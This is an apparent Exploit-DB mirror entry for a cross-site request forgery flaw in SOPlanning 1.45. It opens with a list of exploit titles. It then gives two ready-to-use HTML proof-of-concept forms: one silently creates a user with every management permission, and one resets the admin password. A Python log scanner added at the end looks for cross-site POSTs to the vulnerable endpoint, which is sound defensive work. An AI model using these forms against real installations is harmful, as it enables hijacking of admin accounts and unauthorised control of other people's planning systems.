exploit-db-mirror/exploits/php/webapps/48086.txt
Offensive Security 228a37da9c DB: 2020-02-18
15 changes to exploits/shellcodes

HP System Event 1.2.9.0 - 'HPWMISVC' Unquoted Service Path
BOOTP Turbo 2.0.1214 - 'BOOTP Turbo' Unquoted Service Path
MSI Packages Symbolic Links Processing - Windows 10 Privilege Escalation
DHCP Turbo 4.61298 - 'DHCP Turbo 4' Unquoted Service Path
TFTP Turbo 4.6.1273 - 'TFTP Turbo 4' Unquoted Service Path
Cuckoo Clock v5.0 - Buffer Overflow

Anviz CrossChex - Buffer Overflow (Metasploit)
SOPlanning 1.45 - 'by' SQL Injection
Wordpress Plugin Strong Testimonials 2.40.1 - Persistent Cross-Site Scripting
Avaya Aura Communication Manager 5.2 - Remote Code Execution
Ice HRM 26.2.0 - Cross-Site Request Forgery (Add User)
WordPress Theme Fruitful 3.8 - Persistent Cross-Site Scripting
SOPlanning 1.45 - Cross-Site Request Forgery (Add User)
SOPlanning 1.45 - 'users' SQL Injection
LabVantage 8.3 - Information Disclosure
2020-02-18 05:01:54 +00:00


# Exploit Title: SOPlanning 1.45 - Cross-Site Request Forgery (Add User)
# Date: 2020-02-14
# Exploit Author: J3rryBl4nks
# Vendor Homepage: https://www.soplanning.org/en/
# Software Link: https://sourceforge.net/projects/soplanning/files/soplanning/
# Version 1.45
# Tested on Windows 10/Kali Rolling
# The SoPlanning 1.45 application is vulnerable to CSRF that allows for arbitrary
# user creation and for changing passwords (Specifically the admin password)
# POC for arbitrary user creation:
# CSRF POC:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://10.22.6.208/soplanning/www/process/xajax_server.php" method="POST">
<input type="hidden" name="xajax" value="submitFormUser" />
<input type="hidden" name="xajaxr" value="1581700271752" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="Testing" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="1" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="Testing" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="test&#64;test&#46;com" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="Test" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="test" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="true" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="&#35;FFFFFF" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="false" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="false" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="<xjxobj><e><k>0<&#47;k><v>users&#95;manage&#95;all<&#47;v><&#47;e><e><k>1<&#47;k><v>projects&#95;manage&#95;all<&#47;v><&#47;e><e><k>2<&#47;k><v>projectgroups&#95;manage&#95;all<&#47;v><&#47;e><e><k>3<&#47;k><v>tasks&#95;modify&#95;all<&#47;v><&#47;e><e><k>4<&#47;k><v>tasks&#95;view&#95;all&#95;projects<&#47;v><&#47;e><e><k>5<&#47;k><v>tasks&#95;view&#95;all&#95;users<&#47;v><&#47;e><e><k>6<&#47;k><v>lieux&#95;all<&#47;v><&#47;e><e><k>7<&#47;k><v>ressources&#95;all<&#47;v><&#47;e><e><k>8<&#47;k><v>audit&#95;restore<&#47;v><&#47;e><e><k>9<&#47;k><v>parameters&#95;all<&#47;v><&#47;e><e><k>10<&#47;k><v>stats&#95;users<&#47;v><&#47;e><e><k>11<&#47;k><v>stats&#95;projects<&#47;v><&#47;e><&#47;xjxobj>" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="true" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="<xjxobj><&#47;xjxobj>" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
# POC for admin password change:
# CSRF POC:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://HOSTNAME/soplanning/www/process/xajax_server.php" method="POST">
<input type="hidden" name="xajax" value="submitFormProfil" />
<input type="hidden" name="xajaxr" value="1581702103306" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="ADM" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="test&#64;test&#46;com" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="admin123" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="fr" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="false" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="false" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="true" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="true" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="true" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="false" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
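
Both PoC forms above are plain cross-site POSTs to `xajax_server.php`, so a defender can look for them in web server access logs. The following is an added example, not part of the original exploit entry: it flags POSTs to that endpoint whose Referer is missing or names a different host. It assumes Apache/nginx "combined" log format and a hypothetical site hostname `planning.example.test`; the log lines are constructed.

```python
import re
from urllib.parse import urlsplit

# Endpoint path taken from the PoC forms on this page.
ENDPOINT = "/soplanning/www/process/xajax_server.php"
# Apache/nginx "combined" access-log format (assumed).
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" \d{3} \S+ '
    r'"(?P<referer>[^"]*)" "[^"]*"')

def classify(line, site_host):
    """Return None for lines of no interest, else a verdict for a POST to ENDPOINT."""
    m = LINE_RE.match(line)
    if not m or m["method"] != "POST" or urlsplit(m["path"]).path != ENDPOINT:
        return None
    referer = m["referer"]
    if referer in ("", "-"):
        return "no-referer"          # stripped Referer: worth a manual look
    # Compare the parsed hostname exactly; a substring test would accept
    # look-alike hosts such as planning.example.test.other.example.
    host = (urlsplit(referer).hostname or "").lower()
    return "same-site" if host == site_host.lower() else "cross-site"

def suspicious(lines, site_host):
    """Return (verdict, client_ip) for every POST that is not same-site."""
    out = []
    for line in lines:
        verdict = classify(line, site_host)
        if verdict in ("cross-site", "no-referer"):
            out.append((verdict, line.split()[0]))
    return out

# Constructed sample log lines (documentation IP ranges, hypothetical hostnames).
SAMPLE_LOG = [
    '192.0.2.10 - - [14/Feb/2020:17:11:11 +0000] "POST /soplanning/www/process/xajax_server.php HTTP/1.1" 200 512 "http://planning.example.test/soplanning/www/" "Mozilla/5.0"',
    '198.51.100.7 - - [14/Feb/2020:17:41:43 +0000] "POST /soplanning/www/process/xajax_server.php HTTP/1.1" 200 498 "http://other.example.net/" "Mozilla/5.0"',
    '198.51.100.8 - - [14/Feb/2020:17:42:02 +0000] "POST /soplanning/www/process/xajax_server.php HTTP/1.1" 200 498 "http://planning.example.test.other.example/" "Mozilla/5.0"',
    '203.0.113.5 - - [14/Feb/2020:17:43:10 +0000] "POST /soplanning/www/process/xajax_server.php HTTP/1.1" 200 498 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [14/Feb/2020:17:44:00 +0000] "GET /soplanning/www/process/xajax_server.php HTTP/1.1" 200 20 "http://other.example.net/" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for verdict, ip in suspicious(SAMPLE_LOG, "planning.example.test"):
        print(verdict, ip)
```

Pass the site's hostname without a port. The combined log format does not record the POST body, so a hit shows that a cross-site request reached the endpoint, not which xajax function it invoked.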